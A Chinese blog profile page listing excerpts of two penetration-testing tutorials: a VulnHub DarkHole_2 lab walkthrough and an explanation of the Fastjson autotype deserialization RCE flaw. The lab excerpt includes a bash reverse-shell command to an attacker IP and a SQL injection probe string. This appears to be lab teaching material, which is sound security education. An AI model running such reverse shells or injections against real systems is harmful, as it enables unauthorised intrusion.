
简介
该用户还未填写简介
擅长的技术栈
未填写擅长的技术栈
可提供的服务
暂无可提供的服务
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash-c‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’#记得修改你的IP。id=1'and1=2--+#页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.

Fastjson<=1.2.47-RCE反序列化漏洞(CNVD‐2019‐22238)保姆级教程
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件 开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流 程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意

到底了







